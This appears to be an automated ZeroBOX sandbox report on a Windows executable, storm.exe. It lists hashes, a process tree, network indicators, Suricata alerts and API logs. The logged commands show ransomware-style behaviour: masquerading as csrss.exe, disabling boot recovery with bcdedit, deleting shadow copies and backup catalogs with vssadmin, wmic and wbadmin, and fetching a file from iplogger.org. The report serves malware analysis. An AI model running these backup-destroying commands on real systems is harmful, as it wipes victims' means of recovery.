Summary | ZeroBOX

Category	Machine	Started	Completed
FILE	s1_win7_x6402	Aug. 10, 2021, 10:33 a.m.	Aug. 10, 2021, 10:38 a.m.

Size	406.5KB
Type	PE32 executable (GUI) Intel 80386, for MS Windows
MD5	`de904e0d5b71c0c3d99430b61d40aae2`
SHA256	`43812b98e4f9480d25b426a23a7b4d2a4e498110545c7a3cb21159bf75c18e7b`
CRC32	`5948EAB2`
ssdeep	`6144:Zmr7jJUEMBNUNwxJ6m16i6d+W+u7Qn7prLtSacoTccdk+Hy:ZyfJcLUNMu7Qn7prLQQTccrS`
Yara	PE_Header_Zero - PE File Signature IsPE32 - (no description)

storm.exe "C:\Users\test22\AppData\Local\Temp\storm.exe"
2376
- csrss.exe "C:\Users\test22\AppData\Roaming\Microsoft\Windows\csrss.exe" -start
  2480
  - cmd.exe "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} recoveryenabled no
    2816
  - cmd.exe "C:\Windows\system32\cmd.exe" /C wmic shadowcopy delete
    2916
    - WMIC.exe wmic shadowcopy delete
      3048
  - cmd.exe "C:\Windows\system32\cmd.exe" /C bcdedit /set {default} bootstatuspolicy ignoreallfailures
    2844
  - cmd.exe "C:\Windows\system32\cmd.exe" /C wbadmin delete catalog -quiet
    2256
  - cmd.exe "C:\Windows\system32\cmd.exe" /C vssadmin delete shadows /all /quiet
    532
    - vssadmin.exe vssadmin delete shadows /all /quiet
      2648
  - cmd.exe "C:\Windows\system32\cmd.exe" /C C:\Users\test22\AppData\Local\Temp\~temp001.bat
    2396
    - WMIC.exe wmic shadowcopy delete
      2968
    - vssadmin.exe vssadmin delete shadows /all /quiet
      360

Name	Response	Post-Analysis Lookup
www.geodatatool.com	A 158.69.65.151	158.69.65.151
geoiptool.com	A 158.69.65.151	158.69.65.151
iplogger.org	A 88.99.66.31	88.99.66.31

IP Address	Status	Action
158.69.65.151	Active	Moloch
164.124.101.2	Active	Moloch
88.99.66.31	Active	Moloch

Suricata Alerts

Flow	SID	Signature	Category
TCP 192.168.56.102:49165 -> 158.69.65.151:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49169 -> 158.69.65.151:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined
TCP 192.168.56.102:49168 -> 158.69.65.151:80	2015500	ET POLICY Geo Location IP info online service (geoiptool.com)	Potential Corporate Privacy Violation
TCP 192.168.56.102:49164 -> 158.69.65.151:80	2015500	ET POLICY Geo Location IP info online service (geoiptool.com)	Potential Corporate Privacy Violation
TCP 192.168.56.102:49171 -> 88.99.66.31:443	906200056	SSLBL: Malicious JA3 SSL-Client Fingerprint detected (Tofsee)	undefined

Suricata TLS

Flow	Issuer	Subject	Fingerprint
TLSv1 192.168.56.102:49165 158.69.65.151:443	C=LV, L=Riga, O=GoGetSSL, CN=GoGetSSL RSA DV CA	OU=Domain Control Validated, OU=GoGetSSL Domain SSL, CN=geodatatool.com	e3:80:27:7e:2d:8c:ee:78:ea:85:bf:d4:76:57:c2:f6:5f:73:2f:5f
TLSv1 192.168.56.102:49169 158.69.65.151:443	C=LV, L=Riga, O=GoGetSSL, CN=GoGetSSL RSA DV CA	OU=Domain Control Validated, OU=GoGetSSL Domain SSL, CN=geodatatool.com	e3:80:27:7e:2d:8c:ee:78:ea:85:bf:d4:76:57:c2:f6:5f:73:2f:5f
TLSv1 192.168.56.102:49171 88.99.66.31:443	C=GB, ST=Greater Manchester, L=Salford, O=Sectigo Limited, CN=Sectigo RSA Domain Validation Secure Server CA	CN=*.iplogger.org	55:1e:13:99:46:1c:67:40:a3:48:7f:38:0d:16:e7:51:f4:c4:43:cb

Queries for the computername (15 events)

Time & API	Arguments	Status	Return
GetComputerNameW Aug. 10, 2021, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 10, 2021, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 10, 2021, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 10, 2021, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 10, 2021, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 10, 2021, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 10, 2021, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 10, 2021, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 10, 2021, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 10, 2021, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 10, 2021, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 10, 2021, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 10, 2021, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameA Aug. 10, 2021, 10:33 a.m.	computer_name: TEST22-PC	1	1
GetComputerNameW Aug. 10, 2021, 10:33 a.m.	computer_name: TEST22-PC	1	1

Checks if process is being debugged by a debugger (2 events)

Time & API	Arguments	Status	Return	Repeated
IsDebuggerPresent Aug. 10, 2021, 10:33 a.m.			0	0
IsDebuggerPresent Aug. 10, 2021, 10:33 a.m.			0	0

Command line console output was observed (39 events)

Time & API	Arguments	Status	Return
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: 'bcdedit' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: 'bcdedit' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: 'wbadmin' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: C:\Windows\system32> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: bcdedit console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: /set {default} bootstatuspolicy ignoreallfailures console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: 'bcdedit' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: C:\Windows\system32> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: bcdedit console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: /set {default} recoveryenabled no console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: 'bcdedit' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: C:\Windows\system32> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: wbadmin console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: delete catalog -quiet console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: 'wbadmin' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: C:\Windows\system32> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: wbadmin console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: delete systemstatebackup console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: 'wbadmin' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: C:\Windows\system32> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: wbadmin console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: delete systemstatebackup -keepversions:0 console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: 'wbadmin' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: C:\Windows\system32> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: wbadmin console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: delete backup console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: 'wbadmin' is not recognized as an internal or external command, operable program or batch file. console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: C:\Windows\system32> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: wmic console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: shadowcopy delete console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: C:\Windows\system32> console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: vssadmin console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: delete shadows /all /quiet console_handle: 0x00000007	1	1
WriteConsoleA Aug. 10, 2021, 10:33 a.m.	buffer: ERROR: Description = Initialization failure console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool (C) Copyright 2001-2005 Microsoft Corp. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: Error: Unexpected failure: Class not registered console_handle: 0x00000007	1	1
WriteConsoleA Aug. 10, 2021, 10:33 a.m.	buffer: ERROR: Description = Initialization failure console_handle: 0x0000000b	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: vssadmin 1.1 - Volume Shadow Copy Service administrative command-line tool (C) Copyright 2001-2005 Microsoft Corp. console_handle: 0x00000007	1	1
WriteConsoleW Aug. 10, 2021, 10:33 a.m.	buffer: Error: Unexpected failure: Class not registered console_handle: 0x00000007	1	1

The executable contains unknown PE section names indicative of a packer (could be a false positive) (2 events)

section	.code
section	.rdatau

One or more processes crashed (5 events)

Time & API	Arguments	Status
__exception__ Aug. 10, 2021, 10:33 a.m.	stacktrace: storm+0x2de87 @ 0x42de87 storm+0x2e6a3 @ 0x42e6a3 storm+0x31781 @ 0x431781 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: df 2c 01 df 28 83 f9 08 7e 11 df 68 08 83 f9 10 exception.symbol: storm+0x3031 exception.address: 0x403031 exception.module: storm.exe exception.exception_code: 0xc0000005 exception.offset: 12337 registers.esp: 1637920 registers.edi: 3408128 registers.eax: 0 registers.ebp: 1637976 registers.edx: 34143832 registers.ebx: 27590656 registers.esi: 1638008 registers.ecx: 24	1
__exception__ Aug. 10, 2021, 10:33 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x7533374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x76934387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x7532ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75326a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x75326b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75326a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x75345c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x753c06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x76a0d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x76a0d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x76a0ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x76928a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x76928938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7692950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x76a0dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x76a0db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x76a0e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x76929367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x76929326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755762fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75576d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755777c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7557788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x768ea48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x768e853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x768ea4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x768fcd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x768fd87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7566b727 registers.esp: 40170624 registers.edi: 7132740 registers.eax: 40170624 registers.ebp: 40170704 registers.edx: 6849324 registers.ebx: 40170988 registers.esi: 2147746133 registers.ecx: 6906192	1
__exception__ Aug. 10, 2021, 10:33 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x7533374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x76a0f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x7534414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x768dfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x76a0a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x76fbe99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x76f972ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x76f8ab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x76fbc048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x76f887f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x76f88926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x76f8d55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x76fbc44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x76f8d1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x76f8d1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x76f8d40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x76f8991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x76f88d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x76f8a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76f89b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76f89aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x73066f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x73066e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x730627a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x73062652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x7306253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x73062411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x730625ab wmic+0x39c80 @ 0x499c80 wmic+0x3b06a @ 0x49b06a wmic+0x3b1f8 @ 0x49b1f8 wmic+0x36fcd @ 0x496fcd wmic+0x3d6e9 @ 0x49d6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7566b727 registers.esp: 2222848 registers.edi: 1989278224 registers.eax: 2222848 registers.ebp: 2222928 registers.edx: 1 registers.ebx: 6875852 registers.esi: 2147746133 registers.ecx: 2433802665	1
__exception__ Aug. 10, 2021, 10:33 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x7533374b CoReleaseServerProcess+0x73 OleSaveToStream-0xad ole32+0x64387 @ 0x76934387 NdrpMemoryIncrement+0x3d1 NdrComplexStructMarshall-0x2f rpcrt4+0x1ef51 @ 0x7532ef51 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75326a9c NdrPointerMarshall+0xd6 NdrPointerBufferSize-0x10 rpcrt4+0x16b42 @ 0x75326b42 NdrPointerMarshall+0x30 NdrPointerBufferSize-0xb6 rpcrt4+0x16a9c @ 0x75326a9c NdrConformantArrayFree+0x8c NdrOleFree-0xa rpcrt4+0x35c3a @ 0x75345c3a NdrStubCall2+0x31d NdrUnmarshallBasetypeInline-0x23a rpcrt4+0xb06b8 @ 0x753c06b8 WdtpInterfacePointer_UserUnmarshal+0x256f DllDebugObjectRPCHook-0x1e89 ole32+0x13d7e6 @ 0x76a0d7e6 WdtpInterfacePointer_UserUnmarshal+0x25ff DllDebugObjectRPCHook-0x1df9 ole32+0x13d876 @ 0x76a0d876 WdtpInterfacePointer_UserUnmarshal+0x2b59 DllDebugObjectRPCHook-0x189f ole32+0x13ddd0 @ 0x76a0ddd0 CoTaskMemFree+0x1b02 DcomChannelSetHResult-0x1c8 ole32+0x58a43 @ 0x76928a43 CoTaskMemFree+0x19f7 DcomChannelSetHResult-0x2d3 ole32+0x58938 @ 0x76928938 DcomChannelSetHResult+0x8ff CoGetObject-0x2183 ole32+0x5950a @ 0x7692950a WdtpInterfacePointer_UserUnmarshal+0x2a56 DllDebugObjectRPCHook-0x19a2 ole32+0x13dccd @ 0x76a0dccd WdtpInterfacePointer_UserUnmarshal+0x28ca DllDebugObjectRPCHook-0x1b2e ole32+0x13db41 @ 0x76a0db41 WdtpInterfacePointer_UserUnmarshal+0x2f86 DllDebugObjectRPCHook-0x1472 ole32+0x13e1fd @ 0x76a0e1fd DcomChannelSetHResult+0x75c CoGetObject-0x2326 ole32+0x59367 @ 0x76929367 DcomChannelSetHResult+0x71b CoGetObject-0x2367 ole32+0x59326 @ 0x76929326 gapfnScSendMessage+0x332 GetAppCompatFlags2-0x8ea user32+0x162fa @ 0x755762fa GetThreadDesktop+0xd7 GetWindowLongW-0x2c4 user32+0x16d3a @ 0x75576d3a CharPrevW+0x138 TranslateMessage-0x45 user32+0x177c4 @ 0x755777c4 DispatchMessageW+0xf GetMessageW-0x58 user32+0x1788a @ 0x7557788a CoWaitForMultipleHandles+0x4311 CoRegisterSurrogateEx-0x2fe ole32+0x1a48b @ 0x768ea48b CoWaitForMultipleHandles+0x23c1 CoRegisterSurrogateEx-0x224e ole32+0x1853b @ 0x768e853b CoWaitForMultipleHandles+0x4332 CoRegisterSurrogateEx-0x2dd ole32+0x1a4ac @ 0x768ea4ac CoGetTreatAsClass+0x2619 CoRegisterChannelHook-0x1269 ole32+0x2cd48 @ 0x768fcd48 CoGetTreatAsClass+0x314b CoRegisterChannelHook-0x737 ole32+0x2d87a @ 0x768fd87a BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7566b727 registers.esp: 40957084 registers.edi: 3855940 registers.eax: 40957084 registers.ebp: 40957164 registers.edx: 3572524 registers.ebx: 40957448 registers.esi: 2147746133 registers.ecx: 3629392	1
__exception__ Aug. 10, 2021, 10:33 a.m.	stacktrace: RpcRaiseException+0x42 I_RpcExceptionFilter-0x12 rpcrt4+0x2374b @ 0x7533374b DllDebugObjectRPCHook+0xb6 HACCEL_UserFree-0x57 ole32+0x13f725 @ 0x76a0f725 NdrPointerFree+0x16a IUnknown_Release_Proxy-0x5a rpcrt4+0x3414b @ 0x7534414b ObjectStublessClient25+0x65c CoImpersonateClient-0xbc ole32+0xfe14 @ 0x768dfe14 StgGetIFillLockBytesOnFile+0x16ab5 WdtpInterfacePointer_UserSize-0xe21 ole32+0x13a338 @ 0x76a0a338 IsValidURL+0x4b8c MkParseDisplayNameEx-0x1c6a4 urlmon+0x4e99f @ 0x76fbe99f IntlPercentEncodeNormalize+0x1ff8 CoInternetCombineIUri-0x940 urlmon+0x272ed @ 0x76f972ed RegisterBindStatusCallback+0x40d9 CopyBindInfo-0xbe4 urlmon+0x1ab0d @ 0x76f8ab0d IsValidURL+0x2235 MkParseDisplayNameEx-0x1effb urlmon+0x4c048 @ 0x76fbc048 RegisterBindStatusCallback+0x1dc3 CopyBindInfo-0x2efa urlmon+0x187f7 @ 0x76f887f7 RegisterBindStatusCallback+0x1ef2 CopyBindInfo-0x2dcb urlmon+0x18926 @ 0x76f88926 RevokeBindStatusCallback+0x13ad CreateURLMoniker-0x4b1 urlmon+0x1d55e @ 0x76f8d55e IsValidURL+0x2638 MkParseDisplayNameEx-0x1ebf8 urlmon+0x4c44b @ 0x76fbc44b RevokeBindStatusCallback+0x1045 CreateURLMoniker-0x819 urlmon+0x1d1f6 @ 0x76f8d1f6 RevokeBindStatusCallback+0xffb CreateURLMoniker-0x863 urlmon+0x1d1ac @ 0x76f8d1ac RevokeBindStatusCallback+0x125a CreateURLMoniker-0x604 urlmon+0x1d40b @ 0x76f8d40b RegisterBindStatusCallback+0x2ee7 CopyBindInfo-0x1dd6 urlmon+0x1991b @ 0x76f8991b RegisterBindStatusCallback+0x2333 CopyBindInfo-0x298a urlmon+0x18d67 @ 0x76f88d67 RegisterBindStatusCallback+0x36a4 CopyBindInfo-0x1619 urlmon+0x1a0d8 @ 0x76f8a0d8 RegisterBindStatusCallback+0x3151 CopyBindInfo-0x1b6c urlmon+0x19b85 @ 0x76f89b85 RegisterBindStatusCallback+0x3074 CopyBindInfo-0x1c49 urlmon+0x19aa8 @ 0x76f89aa8 DllRegisterServer+0x14b2 msxml3+0x46f4f @ 0x73066f4f DllRegisterServer+0x13a3 msxml3+0x46e40 @ 0x73066e40 DllGetClassObject+0x3536b DllCanUnloadNow-0x1017 msxml3+0x427a4 @ 0x730627a4 DllGetClassObject+0x35219 DllCanUnloadNow-0x1169 msxml3+0x42652 @ 0x73062652 DllGetClassObject+0x35104 DllCanUnloadNow-0x127e msxml3+0x4253d @ 0x7306253d DllGetClassObject+0x34fd8 DllCanUnloadNow-0x13aa msxml3+0x42411 @ 0x73062411 DllGetClassObject+0x35172 DllCanUnloadNow-0x1210 msxml3+0x425ab @ 0x730625ab wmic+0x39c80 @ 0x499c80 wmic+0x3b06a @ 0x49b06a wmic+0x3b1f8 @ 0x49b1f8 wmic+0x36fcd @ 0x496fcd wmic+0x3d6e9 @ 0x49d6e9 BaseThreadInitThunk+0x12 VerifyConsoleIoHandle-0xb3 kernel32+0x133ca @ 0x76a433ca RtlInitializeExceptionChain+0x63 RtlAllocateActivationContextStack-0xa1 ntdll+0x39ed2 @ 0x77b19ed2 RtlInitializeExceptionChain+0x36 RtlAllocateActivationContextStack-0xce ntdll+0x39ea5 @ 0x77b19ea5 exception.instruction_r: c9 c2 10 00 cc cc cc cc cc 8b ff 55 8b ec 56 8b exception.symbol: RaiseException+0x58 CloseHandle-0x9 kernelbase+0xb727 exception.instruction: leave exception.module: KERNELBASE.dll exception.exception_code: 0x80040155 exception.offset: 46887 exception.address: 0x7566b727 registers.esp: 1108888 registers.edi: 1989278224 registers.eax: 1108888 registers.ebp: 1108968 registers.edx: 1 registers.ebx: 3599052 registers.esi: 2147746133 registers.ecx: 2434488414	1

HTTP traffic contains suspicious features which may be indicative of malware related traffic (2 events)

suspicious_features	GET method with no useragent header				suspicious_request	GET http://geoiptool.com/
suspicious_features	GET method with no useragent header				suspicious_request	GET https://www.geodatatool.com/

Performs some HTTP requests (4 events)

request	GET http://geoiptool.com/
request	GET http://iplogger.org/1L3ig7.gz
request	GET https://www.geodatatool.com/
request	GET https://iplogger.org/1L3ig7.gz

Allocates read-write-execute memory (usually to unpack itself) (6 events)

Time & API	Arguments	Status
NtAllocateVirtualMemory Aug. 10, 2021, 10:33 a.m.	process_identifier: 2376 region_size: 1327104 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01e50000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 10, 2021, 10:33 a.m.	process_identifier: 2376 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1327104 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1
NtAllocateVirtualMemory Aug. 10, 2021, 10:33 a.m.	process_identifier: 2480 region_size: 1327104 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x01de0000 allocation_type: 4096 (MEM_COMMIT) process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 10, 2021, 10:33 a.m.	process_identifier: 2480 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 1327104 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x00400000 process_handle: 0xffffffff	1
NtProtectVirtualMemory Aug. 10, 2021, 10:33 a.m.	process_identifier: 3048 stack_dep_bypass: 0 stack_pivoted: 0 heap_dep_bypass: 0 length: 4096 protection: 64 (PAGE_EXECUTE_READWRITE) base_address: 0x73011000 process_handle: 0xffffffff	1
